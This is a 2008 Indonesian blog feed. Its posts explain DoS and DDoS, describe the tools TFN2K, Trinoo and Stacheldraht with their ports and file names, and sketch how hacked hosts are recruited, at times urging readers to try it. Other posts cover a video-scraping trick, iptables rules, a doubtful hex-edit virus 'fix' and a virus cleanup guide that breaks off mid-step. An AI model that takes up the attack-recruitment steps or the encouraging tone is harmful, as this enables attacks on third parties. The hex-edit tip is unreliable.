noreply@blogger.com (adesurya-online.blogspot.com) — Thu, 22 May 2008 02:58:00 +0000

Varian pertama serangan berupa pengiriman air bah data ke target itu adalah DoS (Denial of Service). Dalam serangan ini penyerang hanya menggunakan satu komputer untuk menyemburkan data ke korbannya.

Penjelasan sederhananya seperti ini: Suatu ketika handphone anda berbunyi. Sebelum anda sempat menggangkatnya handphone anda telah berhenti berbunyi. Tiba-tiba handphone anda berbunyi lagi dan tanpa sempat anda mengangkatnya, bunyi itupun segera berhenti. Beberapa kali anda biarkan tapi masalah ini tak kunjung selesai. Beberapa kolega anda yang hendak menghubungi anda terpaksa tidak bisa melakukannya karena handphone anda sibuk terus. Itulah gambaran sederhana serangan DoS di dunia non-cyber.

Di dunia cyber, kasus anda tersebut merupakan serangan salah satu jenis DOS (Denial of Service). Yang pasti, sebegitu mudahnya DOS ini diterapkan tapi mencegahnya bukanlah suatu hal yang gampang. Target-target serangan DOS biasanya adalah server-server ISP, Internet Banking, E-commerce, Web perusahaan, dan pemerintah.

Serangan DoS dapat dilakukan dengan mengirimkan query sebanyak mungkin hingga target tidak bisa lagi menanganinya sehingga target lumpuh. Cara lain melakukan serangan DoS adalah dengan mengirimkan data rusak atau data yang tidak mampu di tangani oleh server target sehingga server tersebut menjadi hang (tidak bisa berfungsi sebagaimana mestinya dan perlu di restart ulang).

DDOS (Distributed Denial of Service)

Mengirimkan data secara terus menerus dengan menggunakan satu komputer tidak begitu efektif karena biasanya sumber daya server yang diserang lebih besar dari komputer penyerang. Daya bunuh serangan juga akhirnya menjadi lemah.

Hacker penyerangpun memutar otaknya. Serangan dapat lebih mematikan jika tenaga banyak komputer dijadikan satu untuk menciptakan banjir data yang lebih besar.

Komputer-komputer yang diambil alih oleh hacker tersebut disebut zombie. Zombie berfungsi sebagai anak buah atau agent penyerang yang siap beraksi saat mendapat perintah dari “tuannya.”

Semakin banyak zombie yang dkuasai seorang penyerang, semakin berkuasalah sang hacker tersebut karena besarnya tenaga yang ia genggam. Dengan tenaga besar yang dikumpulkan dari komputer-komputer yang dikuasai (secara illegal tentunya) tersebut, serangan DDoS hampir tidak dapat ditangkal. Karena itulah serangan tipe ini sangat populer di kalangan hacker.

Beberapa situs raksasa seperti Amazon.com, eBay, dan Yahoo pada Februari 2000 rontok selama beberapa jam karena serbuan ini. Gedung Putih juga sempat boyongan karena serangan tipe ini. Gedung Putih terpaksa “memindahkan” IP address situsnya karena jengah menerima serangan DDoS yang sudah dirancang untuk muncul pada tanggal dan jam tertentu dengan memanfaatkan virus tertentu tanpa mampu mencegahnya.

DDoS adalah tipe serangan dengan konsep sederhana. Namun efeknya bisa memindahkan “istana negara.”

Menghadapi Serangan DDOS

Serangan DDoS adalah serangan dengan teori sederhana namun dengan dampak yang sangat besar. Sayangnya, sampai saat ini belum ditemukan cara paling tepat untuk menghindari serangan ini secara total.

Meski sampai saat ini belum ada sistem yang kebal terhadap serangan ini, ada sejumlah langkah yang dapat dilakukan untuk memperkecil resiko serangan DDoS ini.

Karena serangan DDoS dapat dilakukan dengan memanfaatkan kelemahan operating system yang anda gunakan, jangan pernah lupa mengupdate patch untuk memerbaiki sistem pengoperasian anda. Ingatlah bahwa tidak ada satupun sistem operasi di dunia ini yang aman dan 100 persen bebas dari kelemahan.

Gunakan hardware/server yang kuat. Server tersebut harus mampu menangani beban yang cukup berat sehingga server anda tidak mudah down. Anda bisa mendesain network yang saling membackup dan akan lebih bagus jika berada pada beberapa daerah sekaligus.

Gunakan firewall untuk mengeblok port-port (pintu masuk) yang tidak di perlukan di server-server anda.

Gunakan IDS (Intrusion Detection System) untuk mendeteksi penyusup dan melakukan pencegahan yang lebih cerdik.

Terminologi dan Tools Pada DDoS (uzi)

Terminologi-terminologi yang umum dalam serangan DDoS antara lain adalah Client – sebuah aplikasi yang digunakan untuk memicu serangan dengan mengirimkan perintah ke komponen-komponen lain, Daemon – sebuah proses dalam menjalankan agent yang bertanggung jawab menerima dan melaksanakan perintah yang dikeluarkan client, Master – host yang menjalankan client, Agent – host yang menjalankan Daemon, dan Target – korban (berupa host atau jaringan) yang dihantam serangan DDoS. Alur serangan DDoS adalah:

Penyerang (Master) -> Client -> Daemon -> Korban (Target)

Tools

Program-program yang dapat digunakan hacker untuk melancarkan serangan DDoS semakin mudah didapatkan dari Internet. Karenanya semakin berbahaya pula ancaman ini dengan semakin banyaknya orang yang dapat melakukannya.

Beberapa tool paling terkenal yang sering digunakan untuk melancarkan serangan DDoS adalah TFN2K, Trinoo dan Stacheldraht

TFN2K

TFN2K (Tribe Flood Network 2000) adalah tool untuk melancarkan serangan DDoS. TFN2K adalah turunan Trojan TFN.

TFN2K memungkinkan master mengeksploitasi sejumlah agent untuk mengkoordinasikan serangan pada satu atau beberapa target yang diincar. Saat ini, Unix, Solaris, dan Windows NT adalah platform-platform yang rentan terhadap serangan ini.

TFN2K adalah sistem dengan dua komponen. Yang pertama adalah client yang dikomando oleh master dan sebuah proses daemon yang beroperasi pada sebuah agent. Master menginstruksikan para agent yang telah ditaklukkannya untuk menyerang target yang telah ditentukan. Para agent tersebut kemudian merespon dengan membanjirkan serbuan paket data. Sejumlah agent, dengan perintah Master, dapat bekerjasama selama serangan ini untuk mematahkan akses target. Komunikasi master-to-agent telah dienkripsi dan bercampur dengan paket-paket yang diluncurkan. Baik komunikasi master-to-agent maupun serangan itu sendiri dapat dikirimkan melalui paket-paket TCP, UDP, dan ICMP yang telah diacak. Master juga dapat melakukan pemalsuan IP address (spoofing). Hal ini membuat penagkalan TFN2K sangat sukar dilakukan.

Trinoo

Trinoo (a.k.a. trin00) adalah program slave/master terkenal yang digunakan dalam serangan DDoS. Daemon Trinoo awalnya ditemukan pada format binary sejumlah sistem Solaris 2.x, yang diidentifikasi dapat dimanfaatkan dengan mengeksploitasi bug buffer overrun.

Jaringan Trinoo dapat berupa ratusan bahkan ribuan sistem di Internet yang diambilalih dengan eksploitasi buffer overrun secara remote. Akses ke sistem-sistem yang dijadikan agent tersebut didapatkan dengan menanamkan program back door sekaligus daemon Trinoo.

Sebuah jaringan Trinoo yang paling tidak terdiri atas 227 sistem – 114 diantaranya merupakan situs-situs Internet – yang pada 17 Agustus 1999 digunakan untuk membanjiri satu sistem yang ada di University of Minnessota. Akibatnya, server malang itu ambruk dan koma selama dua hari. Saat penanganan terhadap serangan 17 Agustus itu dilakukan, banjir besar data juga diketahui sedang menyerang paling tidak 16 sistem lain, yang sebagian terdapat di luar AS.

Stacheldraht

Stacheldraht (Bahasa Jerman yang artinya adalah kawat berduri) adalah tool lain yang populer untuk melancarkan serangan DDoS.

Tool ini sangat unik karena ia menggabungkan fitur-fitur yang dimiliki oleh Trinoo dan TFN generasi pertama. Tool ini juga mempunyai enkripsi komunikasi antara penyerang dan master-master Stacheldraht serta mampu melakukan update agent secara otomatis.

Seperti Trinoo, Stacheldraht terdiri atas program-program master (handler) dan daemon atau bcast (agent). Fitur TFN yang dimiliki Stacheldraht adalah gaya-gaya serangan ICMP flood, SYN flood, UDP flood, dan “Smurf.”

Distributed Denial of Service(DDOS) Attacks

noreply@blogger.com (adesurya-online.blogspot.com) — Thu, 22 May 2008 02:46:00 +0000

Anda Perlu Informasi Serangan Hacker ke Yahoo! MSN, CNN, Buy.com, eBay and Amazon.com ?

1 Apakah itu DDOS ?
2 Definisi Denial of Service Attacks
3 Distributed Denial of Service (DDOS) Attacks.
4 Mengapa Serangan DDOS menjadi sangat populer ?
5 Efek dari serangan DDOS
6 Teknikal overview dari aplikasi DDOS

1.

Apakah itu DDOS ?

Sampai dengan sekarang ini pengertian tetang DDOS adalah seperti yang anda dengarkan beberapa waktu yang lalu mengenai serangan terhadap web site Yahoo! MSN, CNN, Buy.com, eBay dan Amazon.com. Informasi terkini yang didapat kan adalah bahwa serangan hacker itu berasal dari West Coast, United States (Oregon dan California). Dari laporan FBI menuliskan bahwa serangan ini melibatkan beberapa network dari universitas yang ada di daerah tersebut yaitu Stanford, state California dan Santa. Barbara. Pada whitepaper ini akan dibahas sekilas mengenai cara serangan para hacker tersebut ke beberapa web site yang disebutkan di atas.

1. Definisi Denial of Service Attacks

Serangan Denial of Service(DOS) ini terjadi apabila penyerang atau yang sering terdengar dengan istilah hacker ini merusak host atau sevice yang ada sehingga host atau service itu tidak dapat lagi berkomunikasi secara lancar di dalam network neighborhood nya.

Serangan seperti ini juga dapat menghancurkan seluruh host dengan mengakibatkan “kernel panic” pada Linux dan keluarga UNIX lainnya atau lebih umumnya the “blue screen on death” nya Windows NT dan 98.

Serangan DOS ini dapat ditujukan dengan lebih spesifik terhadap services yang ada, contohnya seperti host Web Server dan fungsi dari Network Interface Card (NIC).

Bahkan yang lebih menyenangkan lagi si penyerang menargetkan serangan khusus pada network environment seperti network bandwith dengan menciptakan network request imitasi sehingga terjadi network bussy atau istilah yang lebih familiarnya bottleneck (yang pasti bandwith networknya menjadi full of waste ). Seperti anda ketahui bahwa bandwith adalah bagian yang sangat esensial dari koneksi internet (saluran ke internet). Dengan memenuhi saluran tersebut dengan infomasi sampah(network request imitasi) si penyerang dapat dengan bebas menguasai network bandwith yang masih available. Serangan DOS terakhir yang terjadi adalah pada tgl 7 January 2000.

Serangan DOS ini telah ada pada tahun 1988 yaitu Robert Moris Internet Worm, Melissa virus yang terkenal pada tahun dan masih banyak lagi kejadian DOS pada network dan perusahaan yang tidak diketahui.

Meskipun hal-hal ini disebabkan oleh worm, virusdan beberapa macam dari program yang ada, semua ini terjadi dengan cara yang sama yaitu : satu host menyampaikan informasi atau berkomunikasi dengan host lainnya dan kemudian secara efektif menghancurkan korban dengan mengirim segudang informasi yang tidak dapat di tanggani oleh korban itu sendiri.

1. Serangan Distributed Denial of Service (DDOS).

Perlu digariskan disini bahwa DOS dan DDOS adalah beda. DOS adalah serangan hanya dengan satu node sedangkan DDOS yaitu dengan beberapa node.

Pada tahun 1998 kemajuan dari DOS yang tradisional terlihat dari 3 konsep baru serangan yaitu :

1.
1. Serangan dengan melalui beberapa host.
2. Serangan dengan koordinasi diantara banyak individu yang ada (member dari pemakai network=internet)
3. Serangan dengan menggunakan distribusi system dimana hal ini untuk mencoba membuat bingung jalan menuju ke titik pusat serangan(lihat gambar).
4.

Si penyerang (titik pusat) menyerang host yang ada. Host tersebut tidak berkomunikasi secara langsung dengan korban. Host tersebut adalah administrator yang mengontrol dalam network mereka sendiri yang terdiri dari “Master” dan “Daemon”.

Si penyerang dapat mengontrol/menguasai satu atau bahkan lebih node master tersebut. Master node secara umum akan mengontrol beberapa bahkan lusinan node daemon, yang kemudian akan di alamatkan ke targer/korban.Maka serangan yang dihasilkan akan berupa “packet storm” yang dapat menghancurkan host atau bandwith dari network tersebut.

Keuntungan dan perspektif sebagai hacker dengan menggunakan serangan DDOS yang dapat dilihat disini adalah :

1.
* Si Penyerang dapat menggunakan ratusan system untuk menghancurkan korban.

Serangan tersebut menghasilkan kiriman “packet” yang sangat besar dan dengan cepat dapat menghancurkan korban(target host).

Jika network atau host dapat diatur/dimanage dengan sukses dengan serangan ini, maka dapat anda bayangkan betapa besar koneksi yang digunakan oleh sebuah network dapat dihancurkan dengan serangan DDOS ini. Jadi semakin besar suatu jaringan maka akan semakin besar pula serangan yang ada(menyenangkan bukan ?).

Contoh kasus dapat anda lihat yaitu Yahoo! Dan eBay, perusahaan seperti ini menggunakan kompleks server yang disebut sebagai “cluster servers” dimana mereka bertujuan dengan memberikan service yang OK kepada pelanggan(bandwith yang OK dalam hal ini).

Jadi dapat dilihat disini bahwa system yang “robust”(seperti banyak tertulis dalam produk Microsoft) dan system yang “well-managed” pun dapat dengan mudah dihancurkan dengan system serangan seperti ini. (tertarik anda untuk mencoba ?)

1.
* Tidak hanya programming kita dapat menggunakan multi tier desain tapi dalam hacking pun ada desainnya. Dalam struktur multi tier ini korban akan sangat sulit melacak titik pusat dari serangan tersebut.

Sejauh ini sangat penting untuk dimegerti bahwa sebagian besar dari operator dari host dimana master dan daemon itu berada merupakan bagian pendukung dari DOS ini. Hal ini terjadi karena hacker telah berhubungan dengan master dan daemon node dimana mereka telah menginstall software DOS ini tanpa sepengetahuan pemilik host/administrator/operatornya. Seandainya si korban dapat melacak daemon host sekalipun, pemilik/operator dari host tsb tidak dapat memberikan informasi yang cukup untuk meneruskan upaya ini.

1. Mengapa Serangan DDOS menjadi sangat populer ?

Beberapa jawabannya dapat anda lihat dibawah ini :

1.
* Banyak Operating System dan aplikasi yang memberikan kemudahan dalam instalasi sehingga memberikan beberapa keuntungan seperti menghemat waktu mempelajarinya dan bahkan tidak perlu seorang ahli IT dalam mengoperasikannya. Maka akan sangat sulit bagi mereka untuk memberikan sekuriti kepada system yang mereka install secara otomatis tsb. Bukankah lebih mudah menginstall suatu program atau aplikasi dengan menggunakan default setting yang sudah ada. Contohnya dapat anda lihat pada system BII dan Bank Bali(segera di publish) di site Jasakom ini.
* Banyak dari network environment bernasis pada single operating system. Contohnya jika menggunakan NT semuanya atau Linux di seluruh network environment. Router Cisco, dimana secara merata cara setting nya adalah sama di semua tempat.
* Arsitektur internet yang alami secara mendasar memang sangat tidak secure dan memerlukan lingkungan kerja yang complex, mahal dan banyak menghabiskan waktu.
* Software yang semakin komplex. Kompleks dalam hal ini adalah mengenai source code sehingga hole-hole yang ada dapat di exploit oleh hacker. Contohnya saja seperti Microsoft yang banyak service packnya itu.
* Software yang ada semakin powerful. Dimana software-software yang ada dapat diakses tanpa harus dengan pengetahuan yang terlalu luas.
* Kemajuan internet telah membawa banyak user yang tidak berpengalaman ikut serta dalam lingkungan networking sehingga akan lebih mudah bagi mereka untuk “misconfigured” system daripada memberikan keuntungan bagi system tsb.
* Serangan tsb sulit dilacak. Karena perlu waktu yang berhari-hari bahkan bulanan sehingga si penyerang sudah relatif lepas hari kesalahan yang ada.

5. Efek dari serangan DDOS

Secara umum end user atau korban serangan DDOS ini hanya sadar bahwa serangan seperti in hanya merupakan gangguan yang memerlukan restart system. Tetapi bagaimanapun juga hal seperti ini akan menggangu bisnis yang sedang dijalankan apalagi bisnis yang sangat tergantung kepada system di internet.
Serangan DDOS ini juga dapat merupakan pengalihan point of view dari si hacker untuk mendapatkan informasi penting yang ada. Pada dasarnya serangan DOS ini merupakan rangkaian rencana kerja yang sudah disusun oleh hacker dalam mencapai tujuannya yang telah ditargetkan. Jadi hacker tsb tidak hanya iseng mengadakan serangan DOS ini.
Contohnya adalah jika hacker tsb ingin menyerang Host B maka ia harus menggunakan computer A sebagai alat utk membingungkan korban dalam tracking si penyerang. Dan host A harus mempunyai trust relationship ke host B.

Tehnikal overview dari aplikasi DDOS

Berikut ini akan dibahas secara tehnikal software yang digunakan untuk melancarkan serangan DDOS ini. Mungkin pembahasan ini dapat digunakan sebagai bahan dalam memproteksi diri.

Disini kami hanya membahas 4 macam software dari yang sangat banyak di underground (sama seperti di film Matrix) maaf jika anda berpikir saya terlalu berfantasi (I am TheDreamer)

§ The Tribal Flood Network (TFN)

TFN ini diciptakan oleh hacker yang cukup terkenal pada kalangan underground yang bernama Mixter. Aplikasi ini memungkinkan penyerang membuat flood connection dengan menggunakan protocol yang ada pada TCP/IP :

o UDP : difokuskan pada domain name system dan network management program.

o TCP : pusat e-mail dan web transaksi

o ICMP : digunakan oleh para professional untuk troubleshooting network

Nama program masternya adalah : tribe.c dan program daemon bernama td.c

§ Trin00

Software ini menggunakan UDP untuk mengirimkan flood packets network dengan menggunakan UDP. Port yang digunakan adalah :

Attack to Master : TCP Port 27665

Master to Daemon : UDP Port 27444

Daemon to Master(s) : UDP Port 31335

Program master : master.c

Program Daemon : ns.c

Sebagai saran, program ini tidak bagus untuk digunakan karena master dan daemon berhubungan dengan clear text.

§ Stacheldraht

Program ini cukup ok dan masih baru lho. Nama program ini dalam bahasa Jerman yang berarti “Barb Wire” kenal kan dengan film Barb Wire si Pamela Anderson (Big Tit women). Sama sepeti TFN software ini menggunakan UDP, TCP, ICMP dalam menciptakan rootshell pada port port yang ada. Menggunakan komunikasi encrypt antar master dan daemon. Memiliki kemampuan mengupdate daemonnya sendiri secara otomatis. Maka dari itu program ini paling effisien dan cukup bahaya tapi keren banget.

Port TCP : 16660 dan 60001

Master program bernama : mserv.c

Daemon program bernama : td.c

Program ini memiliki client yang juga sebagai telnet : client.c

Komunikasi antara master dan agent menggunakan ICMP dan TCP sedangkan TFN hanya menggunakan ICMP.

§ TFN2K

Di realease pada tgl 21 Desember 1999. Seperti halnya Stacheldraht program ini meng encrypt tranmision. Berjalan pada platform Windows NT. Tetapi program ini lebih mudah di trace pada daemonnya.

Software DDOS lainnya yang dapat saya sebutkan disini adalah paket seperti bliznet, dscan dan saltine cracker. Dscan adalah software yang dapat scanning distribusi operating system dan cukup sulit untuk di lacak dalam penggunaannya. Sedangkan yang lebih keren lagi adalah saltine cracker suite yang dapat menembus password untuk site-site yang perlu authentication.

Dari ke-4 software di atas yang disebutkan kecuali Stacheldraht setiap software di atas memiliki aplikasi master dan daemon seperti yang telah dibahas sebelumnya diatas.

Sedangkan Stacheldraht memiliki client yang hampir sama dengan telnet. Dimana hacker dapat mengontrol ratusan PC hanya dengan component dari software tsb. Cara kerja dari component ini adalah seperti membuat cabang ke client software(cthnya seperti Windows 98 yang sudah memiliki Telnet client sendiri), jadi hacker dapat mengontrol master dan client.

Hal-hal dan sifat-sifat yang menarik dari kesamaan ke –4 software di atas adalah sbb :
Mudah di instalasi dan di gunakan.(Buruan deh dicoba)
Tidak mudah dilacak jika digunakan, seperti pesawat hantu USA “Stealth” yang tidak dapat di deteksi oleh radar.
Selain dari TFN2K, software lainnya tsb bekerja pada system UNIX. Aslinya software tsb di compiled untuk system Solaris tetapi sekarang telah ada yang dibuat untuk platform lainnya seperti Linux dan Windows NT.
Master dan Daemon selalu diproteksi dengan password.
Pada Master component list dapat di daftarkan dengan mudah daemon yang ingin ditambahkan ke dalamnya.
Setiap DDOS aplikasi memiliki sign tersendiri, sehingga akan adanya kemungkinan untuk mendefinisikan master atau daemon yang telah diinstall di komputer anda.

Bagaimana menginstalasi program DDOS

Untuk menginstalasi program DDOS ini, master atau daemon node harus dikomunikasikan terlebih dahulu sehingga mendapatkan trust security. Untuk mendapatkan trust security adalah dengan cara yang sangat mudah. Gunakan scan tool dari range IP di internet kemudian setelah mendapatkan host-host tsb, baru diinstall client software pada host-host yang masih full of hole security. Satu hal yang cukup menarik adalah software client tsb dapat di uninstall dengan cara di set terlebih dahulu, di uninstall setelah berapa kali serangan.

Hal ini dikarenakan dapat ditrace dengan mudah host yang menyerangnya.
Deteksi terhadap keberadaan installasi DDOS software
Dalam hal ini belum ditemukan tools yang paling OK dalam mendeteksi program DDOS ini.
Hal ini karena program DDOS masih menggunanakan system client-server yang masih tradisional. Program tsb menggunakan port tertentu pada saat aktif sehingga untuk dapat mencegah hal ini maka anda hanya dapat mencari port yang open untuk di closed dengan menggunakan perintah netstat.

Anda juga dapat menggunakan perintah find / -name client, tetapi tentu saja anda sudah tahu program client yang diinstall pada komputer anda.

Banyak dari program DDOS lebih banyak menggunakan fasilitas crontab UNIX yang secara automatic menjalankan aplikasi. Dalam hal seperti ini maka perlu check crontab apakah ada file yang termasuk dalam file-file yang perlu dicurigai sebagai client dari program DDOS ini.

Program yang dapat dipakai untuk mendeteksi program DDOS ini adalah
RID yang ditulis oleh si hacker Mixter (pembuat TFN dan TFN2K), anda dapat mencarinya di internet dengan mudah.
Sickenscan yang dapat mendeteksi password default dari program Stacheldraht.
Trin00killer adalah untuk me-remove program trin00 master dan daemonnya.

(ruthness)

(C)2000 Webmaster of Jasakom All rights reserved

Source: JASAKOM Information Center

Download Video Berita Dari Liputan6.com

noreply@blogger.com (adesurya-online.blogspot.com) — Fri, 16 May 2008 01:31:00 +0000

saya mohon maaf sebelumnya karena ini merupakan saduran artikel dari jasakom.com. artikel ini saya angkat karena ini bisa disebut ilmu yang cukup bermanfaat bagi suatu organisasi. oleh karena itu selaku admin adesurya-online.blogspot.com yang memiliki tujuan berbagi ilmu demi anak bangsa artikel ini saya publikasikan kembali. sebelumnya saya minta maaf kepada saudara aqua, mas sto, n sluruh crew jasakom comunity (tertanda roxio).

Step By Step:
1. Buka www.liputan6.com
2. pilih aja berita sesuka hati mu bos, misal aku pilih yg ini "12/05/2008 23:54
Ribuan Warga Duduki Gedung DPRD Riau "...kekek..
3. klik kanan di tolbar videonya--->> pilih copy link location "
kira-kira seperti ini "javascript:MM_openBrWindow('/mediaplayer/?program=news&id=159302&m_id=718155','mediaplayer','scrollbars=no,resizable=no,width=540,height=680')"
4. "Ternyata pake Java Script "
Coba browsing ke http://liputan6.com//mediaplayer/?program=news&id=159302&m_id=718155
Nah.. dah mulai cerah kan
5. Sekarang klik kanan View Page source--->>
Perhatikan baris ini bos"

var s2 = new SWFObject("flvplayer.swf","playlist","480","380","7");
s2.addParam("wmode","transparent");
s2.addParam("allowScriptAccess", "always");
s2.addParam("allowfullscreen","true");
s2.addVariable("midroll", "386");
s2.addVariable("file","playlist.php%3Fprogram%3Dnews%26id%3D159302%26m_id%3D718155");
s2.addVariable("displayheight","360");
s2.addVariable("autostart","true");
s2.addVariable("repeat","list");
s2.addVariable("shuffle","false");
s2.addVariable("backcolor","0x000000");
s2.addVariable("frontcolor","0xCCCCCC");
s2.addVariable("lightcolor","0x557722");
s2.addVariable("enablejs", "true");
s2.write("player2");

Menurut kamu bos ada yg mencurigakan gak???
Betul bos.. 100% Betul
s2.addVariable("file","playlist.php%3Fprogram%3Dnews%26id%3D159302%26m_id%3D718155");
Mencurigakan
6. Nah link yg tadi kukasih yg ini "http://liputan6.com//mediaplayer/?program=news&id=159302&m_id=718155"
tambahin kata-kata playlist.php
Jadinya seperti ini
http://liputan6.com//mediaplayer/playlist.php?program=news&id=159302&m_id=718155

Nah coba browsing ke http://liputan6.com//mediaplayer/playlist.php?program=news&id=159302&m_id=718155
Apa yg muncul ???
keke.. nampak deh bagian dalamnya

This XML file does not appear to have any style information associated with it. The document tree is shown below.

−

−

−

Liputan6
−

http://static.liputan6.com/200805/080512ddemopetani.flv

Nah sekarang silahkan tinggal diDownload Filenya:
http://static.liputan6.com/200805/080512ddemopetani.flv

Script iptables

noreply@blogger.com (adesurya-online.blogspot.com) — Wed, 30 Apr 2008 00:51:00 +0000

Artikel ini saya tujukan untuk siswa-siswa TKJ yang sedang berusaha mempelajari IP Tables, so pada oom hacker kelas kakap dari pada bosen bacanya mendingan bobok aja deh di rumah (peace dunkz).. ok kita langsung aja,,, 1,,, 2,,,, 3,,, Lets Go....

Bagi pengguna linux, tentunya sudah tidak asing lagi ketika mendengar iptables. Apa itu iptables? Iptables adalah suatu aplikasi yang dapat diperoleh di situs netfilter.org , iptables dapat digunakan sebagai pengaman suatu system yang terhubung ke dalam jaringan. Di bawah ini ada contoh rule-rule yang dapat digunakan untuk mini webserver / personal webserver :D. Untuk mengaplikasikan baris-baris perintah dibawah ini harap untuk disesuaikan dengan kebutuhan.

iptables -A INPUT -p udp -i eth0 --sport 53 --dport 1024:65535 -j ACCEPT
iptables -A INPUT -m state --state ESTABLISHED,RELATED -i eth0 -p tcp -j ACCEPT
iptables -A INPUT -p all -s 124.195.30.64/28 -j ACCEPT -i eth0
iptables -A INPUT -p icmp -j ACCEPT
iptables -A INPUT -m state --state INVALID -j DROP
iptables -A INPUT -i lo -j ACCEPT
iptables -A INPUT -s 124.195.30.64/28 -p tcp --dport 2223 -j ACCEPT
iptables -A INPUT -s 69.88.4.48/29 -p tcp --dport 2223 -j ACCEPT
iptables -A INPUT -p udp -m multiport --dports 53,67,68,123 -j ACCEPT
iptables -A FORWARD -m state --state INVALID -j DROP
iptables -A FORWARD -m conntrack --ctstate DNAT,SNAT -j ACCEPT
iptables -A FORWARD -t filter -o eth0 -m state --state NEW,ESTABLISHED,RELATED -j ACCEPT
iptables -A FORWARD -t filter -i eth0 -m state --state ESTABLISHED,RELATED -j ACCEPT
iptables -A OUTPUT -m state --state INVALID -j DROP
iptables -A OUTPUT -p icmp -j ACCEPT
iptables -A OUTPUT -o lo -j ACCEPT
iptables -A OUTPUT -p udp -m state --state ESTABLISHED,RELATED -j ACCEPT
iptables -A OUTPUT -p udp -o eth0 --dport 53 --sport 1024:65535 -j ACCEPT
iptables -A OUTPUT -o eth0 -m state --state ESTABLISHED,RELATED -j ACCEPT
iptables -A OUTPUT -j ACCEPT -m state --state NEW,ESTABLISHED,RELATED -o eth0 -p tcp

# Ping of Death
iptables -N ping-of-death
iptables -A ping-of-death -m limit --limit 1/sec --limit-burst 4 -j ACCEPT
iptables -A ping-of-death -i eth0 -j LOG --log-level info --log-prefix 'ping-of-death'
iptables -A ping-of-death -j DROP
iptables -A INPUT -p icmp --icmp-type echo-request -j ping-of-death
iptables -A FORWARD -p icmp --icmp-type echo-request -j ping-of-death

# SYN
iptables -N SYN-FLOOD
iptables -A SYN-FLOOD -m limit --limit 1/s --limit-burst 4 -j RETURN
iptables -A SYN-FLOOD -i eth0 -j LOG --log-level info --log-prefix 'SYN-FLOOD'
iptables -A SYN-FLOOD -j DROP
iptables -A INPUT -p tcp --syn -j SYN-FLOOD
iptables -A FORWARD -p tcp --syn -j SYN-FLOOD

#portscan
iptables -N PORT-SCAN
iptables -A PORT-SCAN -m limit --limit 1/s --limit-burst 4 -j RETURN
iptables -A PORT-SCAN -i eth0 -j LOG --log-level info --log-prefix 'PORT-SCAN'
iptables -A PORT-SCAN -j DROP
iptables -A INPUT -p tcp --tcp-flags SYN,ACK,FIN,RST RST -j PORT-SCAN
iptables -A FORWARD -p tcp --tcp-flags SYN,ACK,FIN,RST RST -j PORT-SCAN

The Best Tips Of Virus

noreply@blogger.com (adesurya-online.blogspot.com) — Sat, 26 Apr 2008 12:14:00 +0000

Ternyata, antivirus yang dimaksud bukan berbentuk piranti lunak. "Antivirus yang paling aman sebenarnya terletak pada diri sendiri, caranya jangan sembarangan membuka file asing, jangan mudah tergoda dengan file yang memiliki 'nama-nama menggiurkan' dan aktifkan folder options dengan benar," ujar Aat Shadewa dari Inatradecentre dalam seminar yang diadakan Kamis (24/4/2008) dan Jumat (25/4/2008) di Universitas Gajah Mada, Yogyakarta.

Pada kesempatan itu, Aat pun membagi tips untuk menghalau program jahat yang menginfeksi dokumen digital. Khususnya, file berekstensi .DOC yang diinfeksi virus sehingga menjadi .EXE.

Pengguna komputer, ujar Aat, tidak perlu takut karena ada program HEDIT (Hex Editor) yang menurutnya mampu mengubah file EXE menjadi DOC kembali. Sayangnya program ini belum beredar secara luas dan kebanyakan pengguna komputer mungkin tidak akrab dalam memanfaatkannya.

Cara kerja program ini cukup sederhana. Pertama pengguna perlu membuka file berformat EXE dengan HEDIT, selanjutnya adalah mencari bagian yang terinfeksi. Aat mengatakan, biasanya bagian yang terinfeksi memiliki sandi 4D 5A 60. Bagian itu, ujarnya bisa dihapus sehingga muncul sandi DO CF 11 untuk file DOC.

8 Petunjuk Membersihkan Virus Ninja Hokage

noreply@blogger.com (adesurya-online.blogspot.com) — Fri, 18 Apr 2008 07:54:00 +0000

Salah satu ciri virus Hokage dari diduga berasal dari Sampit adalah mengubah icon Flash Disk menjadi icon Winamp. Virus ini sebenarnya masih mudah untuk dibasmi.

Berikut cara membasmi virus Sampit yang juga dikenal dengan VBWorm.Gen16, yang dikutip detikINET dari keterangan resmi Vaksincom, Kamis (10/4/2008):

1. Matikan "System Restore" selama proses pembersihan (jika menggunakan Windows XP)
2. Matikan proses virus (gunakan currprocess).
Setelah menjalankan tools "Currprocess", pilih file semua file yang mempuyai icon winamp (Rin.exe, Obito.exe, KakashiHatake.exe dan Hokage4.exe).

3. Hapus registri yang dibuat oleh VBWorm.gen16. Untuk mempermudah proses penghapusan, salin script dibawah ini pada program Notepad lalu simpan dengan nama repair.inf. Jalankan file repair..inf dengan cara:

* Klik kanan repair.inf
* Klik Install

[Version]
Signature="$Chicago$"
Provider=Vaksincom Naruto
[DefaultInstall]
AddReg=UnhookRegKey
DelReg=del
[UnhookRegKey]
HKLM, Software\CLASSES\batfile\shell\open\command,,,"""%1"" %*"
HKLM, Software\CLASSES\comfile\shell\open\command,,,"""%1"" %*"
HKLM, Software\CLASSES\exefile\shell\open\command,,,"""%1"" %*"
HKLM, Software\CLASSES\piffile\shell\open\command,,,"""%1"" %*"
HKLM, Software\CLASSES\regfile\shell\open\command,,,"regedit.exe "%1""
HKLM, Software\CLASSES\scrfile\shell\open\command,,,"""%1"" %*"
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon, Shell,0, "Explorer.exe"
[del]
HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\System, DisableRegistryTools
HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\System, DisableTaskMgr
HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\Explorer, NoFolderOptions
HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\Explorer, NOFind
HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\Explorer, NORun
HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\WinOldApp
HKLM, SOFTWARE\Microsoft\Windows\CurrentVersion\Run, Hokage 4
HKLM, SOFTWARE\Microsoft\Windows\CurrentVersion\Run, Kakashi Hatake
HKLM, SOFTWARE\Microsoft\Windows\CurrentVersion\Run, Obito Uchiha
HKLM, SOFTWARE\Microsoft\Windows\CurrentVersion\Run, Rin

4. Cari dan hapus file yang sudah dibuat oleh virus. Untuk mempercepat proses pencarian penghapusan, gunakan fitur "Search Windows". Sebelum melakukan pencarian dan penghapusan file virus, tampilkan terlebih dahulu file yang tersembunyi agar pencarian lebih maksimal. Untuk menampilkan file yang tersembunyi lakukan langkah berkut:

- Buka Windows Explorer
- Klik menu "Tools", kemudian klik "Folder Options"
